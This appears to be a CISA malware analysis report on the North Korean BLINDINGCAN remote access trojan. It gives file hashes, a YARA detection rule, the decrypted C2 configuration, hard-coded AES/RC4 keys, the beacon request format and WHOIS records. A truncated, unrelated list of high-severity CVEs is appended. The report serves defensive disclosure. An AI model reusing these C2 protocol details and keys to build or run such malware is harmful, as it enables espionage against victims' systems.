61de5945f98a8652eaf4ae5b93b41128
UPX1
838656
7.999757

70b01a5a98c1febe2bde96c9270957c3
.rsrc
5632
3.718427

Relationships

d5186efd85…
Connected_To
curiofirenze.com

d5186efd85…
Connected_To
automercado.co.cr

d5186efd85…
Dropped_By
0fc12e03ee93d19003b2dd7117a66a3da03bd6177ac6eb396ed52a40be913db6

d5186efd85…
Contains
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

d5186efd85…
Contains
8b53b519623b56ab746fdaf14d3eb402e6fa515cde2113a07f5a3b4050e98050

Description

This application is a 64-bit UPX packed DLL installed by “0FC12E03EE93D19003B2DD7117A66A3DA03BD6177AC6EB396ED52A40BE913DB6″ into the C:ProgramDataiconcache.db” directory. During execution, it uses AES cipher to decrypt and then decompress two embedded 64-bit DLL binaries “58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d” and “8b53b519623b56ab746fdaf14d3eb402e6fa515cde2113a07f5a3b4050e98050” in memory. These binaries are loaded and executed in memory during runtime.

58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

Tags

HIDDEN-COBRA

Details

Name
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

Size
214608 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
6c2d15114ebdd910a336b6b147512a74

SHA1
9feef1eed2a8a5cbfe1c6478f2740d8fe63305e2

SHA256
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

SHA512
77fd1d56a0f0cf143286fb78519b69eb8ef30f383c117d353ab16d0be5f2bfdbdb847d717dbc8b70b5d806a46fa4a1dc29a8304b8349bc1097075f50557c5da8

ssdeep
3072:WvG/9l8VoAo8gj83efR0TmXBlPbAjoSrL90z1agX:0VoAo8qlWTmXBlPbAjHl0j

Entropy
4.709829

Antivirus

No matches found.

YARA Rules

rule CISA_10295134_01 : rat trojan HIDDENCOBRA BLINDINGCAN
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10295134”
       Date = “2020-07-28”
       Last_Modified = “20200730_1030”
       Actor = “HiddenCobra”
       Category = “Trojan RAT”
       Family = “BLINDINGCAN”
       Description = “Detects 32 and 64bit HiddenCobra BlindingCan Trojan RAT”
       MD5_1 = “e7718609577c6e34221b03de7e959a8c”
       SHA256_1 = “bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1”
       MD5_2 = “6c2d15114ebdd910a336b6b147512a74”
       SHA256_2 = “58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d”
   strings:
       $s0 = { C7 44 24 20 0D 06 09 2A C7 44 24 24 86 48 86 F7 C7 44 24 28 0D 01 01 01 C7 44 24 2C 05 00 03 82 }
       $s1 = { C7 45 EC 0D 06 09 2A C7 45 F0 86 48 86 F7 C7 45 F4 0D 01 01 01 C7 45 F8 05 00 03 82 }
   condition:
       $s0 or $s1
}

ssdeep Matches

90
20ee5fdc9589067a7a312d6f660f0c8f33048f511975298ca6a9bfed145fe8fd

100
78a65874b49922217fd0423cc6293a23f70cb804022283ed3187b71178663ca3

PE Metadata

Compile Date
2020-05-19 03:26:27-04:00

Import Hash
af2479dbb1f93be4fc4a092cbbd4df85

PE Sections

MD5
Name
Raw Size
Entropy

6066ee1e6c73fe6133738f26cf898280
header
1024
2.581998

bfbe6f46025a25810199ae50f7f7ed04
.text
90624
6.498666

2cc742e33c53aeb638e9798422f8adaa
.rdata
31232
6.194223

21c81d1a5ad5583610f1bcb7827fec54
.data
14336
3.377777

0a93a2ad9833deb5581854bc11c7fcb7
.pdata
3584
4.918413

9a33838895830247744985365b8b2948
.rsrc
512
5.115767

e032dedb2f8e5a189a3a98897f1f7f92
.reloc
1536
2.852342

Relationships

58027c80c6…
Contained_Within
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

58027c80c6…
Connected_From
curiofirenze.com

58027c80c6…
Connected_From
automercado.co.cr

Description

This application is a malicious 64-bit DLL unpacked and executed by “d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5”. This binary has been identified as a 64-bit version of the Hidden Cobra RAT “bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1”. This file contains the same embedded configuration data. The embedded data is decrypted using a hard-coded AES decryption key: “81SNWX3ALGPDMW5V”. The decrypted data is decoded using an XOR cipher. Displayed below is the content of the decoded data:

–Begin configuration data–
https[:]//www[.]automercado.co.cr/empleo/css/main.jsp
https[:]//www[.]automercado.co.cr/empleo/css/main.jsp
https[:]//www[.]automercado.co.cr/empleo/css/main.jsp
https[:]//www[.]curiofirenze.com/include/inc-site.asp
https[:]//www[.]curiofirenze.com/include/inc-site.asp
c:windowssystem32cmd.exe
%temp%
–End configuration data–

The malware decrypts its strings using a hard-coded RC4 key “0D 06 09 2A 86 48 86 F7 0D 01 01 01 05 00 03 82”. Displayed below are sample decrypted strings observed during analysis:

–Begin decrypted strings–
“HardwareDescriptionSystemCentralProcessor”
“ProcessorNameString”
“boardid, bbsNo, strBoardID, userid, bbsfilename, code, pidseqNo, ReportID, v, PageNumbernumviewread, action, pagemodeidx, cateId, bbsId, pType, pcode, index, tblidx_num, act, bbs_id, bbs_form, bidbbscate, menutcode, b_code, bname, tb, borad01, borad02, borad03, midnewsid, table, Board_seq, bc_idx, seqArticleIDB_Notice, nowPage, webid, boardDiv, sub_idx”
“\tsclient”
–End decrypted strings–

It collects the following information about the victim’s system and beacons the collected data to the C2 “curiofirenze.com” and
“automercado.co.cr”:

–Begin system information–
Operating system (OS) version information
Processor information
System name
Local IP address information
Media access control (MAC) address.
–End system information–

It attempts to retrieve the User-Agent string from the victim’s system, if not available, it uses the following embedded User-Agent string:

–Begin User-Agent String–
“Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36″ .
–End User-Agent String–

It will generate HTTP POST requests with the following format:

–Begin HTTP POST format–
POST /<uri> HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: <obtained from ObtainUserAgentString otherwise: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 >
Host: <domain>
Content-Length: <length>

id=<nine random character generated RC4 key><three_random_param_selected>&<second parameter>=<sessionID>&<third parameter >=<hard-coded_String>&<fourth parameter>=<datagram>
–End HTTP POST format–

The HTTP POST body contains four parameters of Base64 encoded data as displayed below:

–Begin four parameters–
Four parameters: id=<nine random character generated RC4 key><three_random_param_selected>&<second parameter>=<sessionID>&<third parameter >=<hard-coded_String>&<fourth parameter>=<datagram>

Sample: id=Z2ptZmx0b250JpzkM7R+AAxesq7t1Eo4Dg==&page=bsyybw==&bbsNo=AszBYcolV00l69W9ihtkLg==&bname=”
–End four parameters–

The first parameter tag, ‘id=’, will consist of two separate Base64 encoded parts. The first part consists of a Base64 encoded nine random generated lower case character RC4 key used for encryption. The second part of the ‘id=’ parameter tag will contain three parameters randomly selected from a list of the below strings. These three randomly selected name tags are colon delimited and stored in the following format:”first name tag:second name tag:third name tag”. This data is encrypted using the nine random character generated RC4 key and Base64 encoded.

–Begin randomly selected string tags–
“boardid, bbsNo, strBoardID, userid, bbsfilename, code, pidseqNo, ReportID, v, PageNumbernumviewread, action, pagemodeidx, cateId, bbsId, pType, pcode, index, tblidx_num, act, bbs_id, bbs_form, bidbbscate, menutcode, b_code, bname, tb, borad01, borad02, borad03, midnewsid, table, Board_seq, bc_idx, seqArticleIDB_Notice, nowPage, webid, boardDiv, sub_idx”
–End randomly selected string tags–

The second parameter tag ‘page=’ is a randomly selected name from the list of the above string tags which contains the “session id” data. This data is encrypted using the same generated RC4 key before Base64 encoded.

The third parameter tag ‘bbsNo=’ is a randomly selected name from the list of the above string tags which contains a hard-coded string data “T1B7D95256A2001E” in the malware. This data is encrypted using the RC4 key and then the data is Base64 encoded. Analysis indicates that when encrypting data from the first three parameters, the encryption starts “0xC00 bytes” into the RC4 key stream.

The fourth parameter tag ‘bname=’ is a randomly selected name from a list of the above string tags which contains the datagram to be sent. The datagram is encrypted with a combination of RC4 and differential XOR. The RC4 key used is “0D 06 09 2A 86 48 86 F7 0D 01 01 01 05 00 03 82”.

It contains the following built-in functions for remote operations that provide various capabilities on a victim’s system:

–Begin built-in functions–
Retrieve information about all installed disks, including the disk type and the amount of free space on the disk
Create, start, and terminate a new process and its primary thread
Search, read, write, move, and execute files
Get and modify file or directory timestamps
Change the current directory for a process or file
Delete malware and artifacts associated with the malware from the infected system
–End built-in functions–

8b53b519623b56ab746fdaf14d3eb402e6fa515cde2113a07f5a3b4050e98050

Details

Name
8b53b519623b56ab746fdaf14d3eb402e6fa515cde2113a07f5a3b4050e98050

Size
172208 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
63d155f889e09272d85cfd9dfc266131

SHA1
3f6ef29b86bf1687013ae7638f66502bcf883bfd

SHA256
8b53b519623b56ab746fdaf14d3eb402e6fa515cde2113a07f5a3b4050e98050

SHA512
1f5464c9cb2786174d953666a287d5a681abe627e9caddf45986cd73290e6d73db9ddf2ccd589a0c09e4fe10cdf42b1d8d31dbfc5759505866f516769fea1727

ssdeep
768:XKXHstI+TCTWBGtl7CTnEUbrNXzuXrSXjkD4opaY16iWr:X7TCN/CTrbrNjGsjMdvW

Entropy
1.637592

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2019-10-30 22:21:47-04:00

Import Hash
7e564082b35201e421694b4ecea4ed0a

PE Sections

MD5
Name
Raw Size
Entropy

71170f767f99b3b8e8fb41eb4ca505b9
header
1024
2.465212

99d34a0fcb234b3aed2a92fc7101b9f5
.text
20480
6.210180

46abe134e48b8af335f468d25c91a1fe
.rdata
9728
4.554618

c545b6874d37d733e970a7e884ddc2c7
.data
4096
2.099924

0d6201e58760b130181228a80ca4a775
.pdata
1536
3.828383

a09ee0743bee58fbe63a9a50c1d3f79b
.rsrc
512
5.105029

1360c7212899568e17f02f8e61db1c60
.reloc
512
4.003257

Relationships

8b53b51962…
Contained_Within
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

Description

This application is a 64-bit DLL unpacked and executed by “d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5”. This file is designed to unmap the DLL “C:ProgramDataiconcache.db” loaded in the process.

curiofirenze.com

Tags

command-and-control

URLs

hxxps[:]//www[.]curiofirenze.com/include/inc-site.asp

Ports

443 TCP

HTTP Sessions

https://www.curiofirenze.com/include/inc-site.asp
id=bHRhcGpjaGR05HIC99liJ/0pLNaM14H22x8ktA==&PageNumber=hitSpw==&bname=4CInpdMuf615aK3cidCq+w==&tb=
Connection: Keep-Alive
Cache-Control: no-cache
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: %d Mozilla/5 0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Whois

Domain Name: curiofirenze.com
Registry Domain ID: 1874895918_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.joker.com
Registrar URL: https://joker.com
Updated Date: 2019-11-25T10:15:37Z
Creation Date: 2014-09-09T12:05:53Z
Registrar Registration Expiration Date: 2020-09-09T12:05:53Z
Registrar: CSL Computer Service Langenbach GmbH d/b/a joker.com
Registrar IANA ID: 113
Registrar Abuse Contact Email: abuse@joker.com
Registrar Abuse Contact Phone: +49.21186767447
Reseller: CWNET s.r.l.
Reseller: Internet Service Provider
Reseller: http://www.cheapnet.it
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Curio s.r.l.
Registrant State/Province: FI
Registrant Country: IT
Name Server: lady.ns.cloudflare.com
Name Server: phil.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2020-06-30T20:18:19Z <<<

Relationships

curiofirenze.com
Connected_From
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

curiofirenze.com
Connected_From
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

curiofirenze.com
Resolved_To
192.99.20.39

curiofirenze.com
Connected_From
bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

curiofirenze.com
Connected_To
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

Description

Both the 32-bit and 64-bit “iconcache.db” connect to the domain via HTTPS POST requests on port 443 with encoded data.

192.99.20.39

Whois

Queried whois.arin.net with “n 192.99.20.39″…

NetRange:     192.99.0.0 – 192.99.255.255
CIDR:         192.99.0.0/16
NetName:        OVH-ARIN-7
NetHandle:     NET-192-99-0-0-1
Parent:         NET192 (NET-192-0-0-0-0)
NetType:        Direct Allocation
OriginAS:     AS16276
Organization: OVH Hosting, Inc. (HO-2)
RegDate:        2013-06-17
Updated:        2013-06-17
Comment:        www.ovh.com
Ref:            https://rdap.arin.net/registry/ip/192.99.0.0

OrgName:        OVH Hosting, Inc.
OrgId:         HO-2
Address:        800-1801 McGill College
City:         Montreal
StateProv:     QC
PostalCode:     H3A 2N4
Country:        CA
RegDate:        2011-06-22
Updated:        2017-01-28
Ref:            https://rdap.arin.net/registry/entity/HO-2

OrgAbuseHandle: ABUSE3956-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-855-684-5463
OrgAbuseEmail: abuse@ovh.ca
OrgAbuseRef:    https://rdap.arin.net/registry/entity/ABUSE3956-ARIN

OrgTechHandle: NOC11876-ARIN
OrgTechName: NOC
OrgTechPhone: +1-855-684-5463
OrgTechEmail: noc@ovh.net
OrgTechRef:    https://rdap.arin.net/registry/entity/NOC11876-ARIN

Relationships

192.99.20.39
Resolved_To
curiofirenze.com

Description

Domain “curiofirenze.com” resolved to this IP address during analysis.

automercado.co.cr

Tags

command-and-control

URLs

hxxps[:]//www[.]automercado.co.cr/empleo/css/main.jsp

Ports

443 TCP

HTTP Sessions

hxxps[:]//www[.]automercado.co.cr/empleo/css/main.jsp
id=ZHJnd296a3RneKp2cza8ztn5YZTuEO4IhpdkXb0=&bbs_id=Kfk8Gw==&bname=TvlHGxvhwYmiNri5Grdduw==&idx_num=
Connection: Keep-Alive
Cache-Control: no-cache
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: %d Mozilla/5 0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Whois

domain:     automercado.co.cr
registrant: CON-292
admin-c:     CON-292
nsset:        AUTOMERCADO_CO_CR
registrar:    NIC-REG1
registered: 03.03.1996 06:00:00
changed:     24.02.2020 08:19:22
expire:     02.03.2021

contact:     CON-292
address:     San José
address:     1500-1000
address:     San Josí©
address:     CR
registrar:    NIC-REG1
created:     03.06.2011 22:38:21

nsset:        AUTOMERCADO_CO_CR
nserver:     ns3.x-peditenetworks.com
nserver:     ns1.x-peditenetworks.com
nserver:     ns2.x-peditenetworks.com
tech-c:     ASANCHEZ_AT_AUTOMERCADO.CR
registrar:    NIC-REG1
created:     03.06.2011 12:27:09
changed:     25.09.2012 10:01:46

address:     50 m sur del parque morazan
address:     San Jose
address:     1500-1000
address:     San José
address:     CR
registrar:    NIC-REG1
created:     25.09.2012 09:59:04
                                           

Relationships

automercado.co.cr
Resolved_To
54.241.91.49

automercado.co.cr
Connected_From
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

automercado.co.cr
Connected_From
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

automercado.co.cr
Connected_From
bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

automercado.co.cr
Connected_To
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

Description

Both the 32-bit and 64-bit “iconcache.db” connect to the domain via HTTPS POST requests on port 443 with encoded data.

54.241.91.49

Whois

Queried whois.arin.net with “n 54.241.91.49″…

NetRange:     54.240.0.0 – 54.255.255.255
CIDR:         54.240.0.0/12
NetName:        AMAZON-2011L
NetHandle:     NET-54-240-0-0-1
Parent:         NET54 (NET-54-0-0-0-0)
NetType:        Direct Allocation
OriginAS:     AS16509
Organization: Amazon Technologies Inc. (AT-88-Z)
RegDate:        2011-12-09
Updated:        2012-04-02
Ref:            https://rdap.arin.net/registry/ip/54.240.0.0

OrgName:        Amazon Technologies Inc.
OrgId:         AT-88-Z
Address:        410 Terry Ave N.
City:         Seattle
StateProv:     WA
PostalCode:     98109
Country:        US
RegDate:        2011-12-08
Updated:        2020-03-31
Comment:        All abuse reports MUST include:
Comment:        * src IP
Comment:        * dest IP (your IP)
Comment:        * dest port
Comment:        * Accurate date/timestamp and timezone of activity
Comment:        * Intensity/frequency (short log extracts)
Comment:        * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
Ref:            https://rdap.arin.net/registry/entity/AT-88-Z

OrgAbuseHandle: AEA8-ARIN
OrgAbuseName: Amazon EC2 Abuse
OrgAbusePhone: +1-206-266-4064
OrgAbuseEmail: abuse@amazonaws.com
OrgAbuseRef:    https://rdap.arin.net/registry/entity/AEA8-ARIN

OrgNOCHandle: AANO1-ARIN
OrgNOCName: Amazon AWS Network Operations
OrgNOCPhone: +1-206-266-4064
OrgNOCEmail: amzn-noc-contact@amazon.com
OrgNOCRef:    https://rdap.arin.net/registry/entity/AANO1-ARIN

OrgTechHandle: ANO24-ARIN
OrgTechName: Amazon EC2 Network Operations
OrgTechPhone: +1-206-266-4064
OrgTechEmail: amzn-noc-contact@amazon.com
OrgTechRef:    https://rdap.arin.net/registry/entity/ANO24-ARIN

OrgRoutingHandle: ADR29-ARIN
OrgRoutingName: AWS Dogfish Routing
OrgRoutingPhone: +1-206-266-4064
OrgRoutingEmail: aws-dogfish-routing-poc@amazon.com
OrgRoutingRef:    https://rdap.arin.net/registry/entity/ADR29-ARIN

OrgRoutingHandle: IPROU3-ARIN
OrgRoutingName: IP Routing
OrgRoutingPhone: +1-206-266-4064
OrgRoutingEmail: aws-routing-poc@amazon.com
OrgRoutingRef:    https://rdap.arin.net/registry/entity/IPROU3-ARIN

Relationships

54.241.91.49
Resolved_To
automercado.co.cr

Description

Domain “automercado.co.cr” resolved to this IP during analysis.

Relationship Summary

586d012540…
Connected_To
agarwalpropertyconsultants.com

agarwalpropertyconsultants.com
Connected_From
586d012540ed1244572906e3733a0cb4bba90a320da82f853e5dfac82c5c663e

agarwalpropertyconsultants.com
Resolved_To
199.79.63.24

199.79.63.24
Resolved_To
agarwalpropertyconsultants.com

158ddb8561…
Connected_To
anca-aste.it

7933716892…
Connected_To
anca-aste.it

6a3446b8a4…
Connected_To
anca-aste.it

anca-aste.it
Resolved_To
51.68.152.96

anca-aste.it
Connected_From
6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1

anca-aste.it
Connected_From
158ddb85611b4784b6f5ca7181936b86eb0ec9a3c67562b1d57badd7b7ec2d17

anca-aste.it
Connected_From
7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971

51.68.152.96
Resolved_To
anca-aste.it

d40ad4cd39…
Dropped
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

b70e66d387…
Connected_To
curiofirenze.com

b70e66d387…
Connected_To
automercado.co.cr

b70e66d387…
Dropped_By
d40ad4cd39350d718e189adf45703eb3a3935a7cf8062c20c663bc14d28f78c9

b70e66d387…
Contains
bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

b70e66d387…
Contains
7d507281e2e21476ff1af492ad9f574b14cbf77eb4cda9b67e4256318c7c6bbd

bdfd16dc53…
Contained_Within
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

bdfd16dc53…
Connected_To
curiofirenze.com

bdfd16dc53…
Connected_To
automercado.co.cr

7d507281e2…
Contained_Within
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

0fc12e03ee…
Dropped
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

d5186efd85…
Connected_To
curiofirenze.com

d5186efd85…
Connected_To
automercado.co.cr

d5186efd85…
Dropped_By
0fc12e03ee93d19003b2dd7117a66a3da03bd6177ac6eb396ed52a40be913db6

d5186efd85…
Contains
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

d5186efd85…
Contains
8b53b519623b56ab746fdaf14d3eb402e6fa515cde2113a07f5a3b4050e98050

58027c80c6…
Contained_Within
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

58027c80c6…
Connected_From
curiofirenze.com

58027c80c6…
Connected_From
automercado.co.cr

8b53b51962…
Contained_Within
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

curiofirenze.com
Connected_From
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

curiofirenze.com
Connected_From
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

curiofirenze.com
Resolved_To
192.99.20.39

curiofirenze.com
Connected_From
bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

curiofirenze.com
Connected_To
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

192.99.20.39
Resolved_To
curiofirenze.com

automercado.co.cr
Resolved_To
54.241.91.49

automercado.co.cr
Connected_From
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

automercado.co.cr
Connected_From
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

automercado.co.cr
Connected_From
bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

automercado.co.cr
Connected_To
58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d

54.241.91.49
Resolved_To
automercado.co.cr

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

1-888-282-0870

CISA Service Desk (UNCLASS)

CISA SIPR (SIPRNET)

CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

Web: https://malware.us-cert.gov

E-Mail: submit@malware.us-cert.gov

FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 17, 2020 

High Vulnerabilities

Primary
Vendor — Product
Description
Published
CVSS Score
Source & Patch Info

apache — http_server
Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE
2020-08-07
7.5

CVE-2020-11984
MLIST
MLIST
MLIST
MLIST
MLIST
MISC
MLIST
MLIST
GENTOO
CONFIRM

digitus — da-70254_firmware
DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter.
2020-08-07
8.3

CVE-2020-15063
MISC

firejail_project — firejail
Firejail through 0.9.62 mishandles shell metacharacters during use of the –output or –output-stderr option, which may lead to command injection.
2020-08-11
7.5

CVE-2020-17368
SUSE
MISC
DEBIAN
DEBIAN

flatcore — flatcore
flatCore before 1.5.7 allows upload and execution of a .php file by an admin.
2020-08-09
9

CVE-2020-17452
MISC
MISC

google — android
There is a possible out of bounds read due to an incorrect bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-152647751
2020-08-11
7.8

CVE-2020-0254
MISC

google — android
In android_verity_ctr of dm-android-verity.c, there is a possible way to modify a dm-verity protected filesystem due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-157941353References: N/A
2020-08-11
7.2

CVE-2020-0259
MISC

google — android
In SpecializeCommon of com_android_internal_os_Zygote.cpp, there is a permissions bypass due to an incomplete cleanup. This could lead to local escalation of privilege in isolated processes with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-156741968
2020-08-11
7.2

CVE-2020-0257
MISC

google — android
In LoadPartitionTable of gpt.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege when inserting a malicious USB device, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-8.0Android ID: A-152874864
2020-08-11
7.2

CVE-2020-0256
MISC

google — android
In clearPropValue of MediaAnalyticsItem.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the media server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-8.0 Android-8.1Android ID: A-151644303
2020-08-11
7.2

CVE-2020-0243
MISC

google — android
In reset of NuPlayerDriver.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the media server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151643722
2020-08-11
7.2

CVE-2020-0242
MISC

google — android
In NuPlayerStreamListener of NuPlayerStreamListener.cpp, there is possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151456667
2020-08-11
7.2

CVE-2020-0241
MISC

google — android
In postNotification of ServiceRecord.java, there is a possible bypass of foreground process restrictions due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.1 Android-9Android ID: A-140108616
2020-08-11
7.2

CVE-2020-0108
MISC

google — android
There is a possible memory corruption due to a use after free.Product: AndroidVersions: Android SoCAndroid ID: A-152647365
2020-08-11
10

CVE-2020-0253
MISC

google — android
There is a possible memory corruption due to a use after free.Product: AndroidVersions: Android SoCAndroid ID: A-152236803
2020-08-11
10

CVE-2020-0252
MISC

google — android
There is a possible out of bounds read due to an incorrect bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-152647626
2020-08-11
7.8

CVE-2020-0251
MISC

google — android
In NewFixedDoubleArray of factory.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-150706594
2020-08-11
9.3

CVE-2020-0240
MISC

ibm — websphere_application_server
IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to execute arbitrary code on the system with a specially-crafted sequence of serialized objects from untrusted sources. The vulnerability only occurs if an undocumented customization has been applied by an administrator. IBM X-Force ID: 184585.
2020-08-13
10

CVE-2020-4589
XF
CONFIRM

json_pattern_validator_project — json_pattern_validator
jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array.
2020-08-10
7.5

CVE-2020-17479
MISC
MISC
MISC
MISC

lindy-international — 42633_firmware
Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter.
2020-08-07
8.3

CVE-2020-15059
MISC

microfocus — secure_messaging_gateway
DKIM key management page vulnerability on Micro Focus Secure Messaging Gateway (SMG). Affecting all SMG Appliance running releases prior to July 2020. The vulnerability could allow a logged in user with rights to generate DKIM key information to inject system commands into the call to the DKIM system command.
2020-08-07
9

CVE-2020-11852
MISC

mozilla — firefox
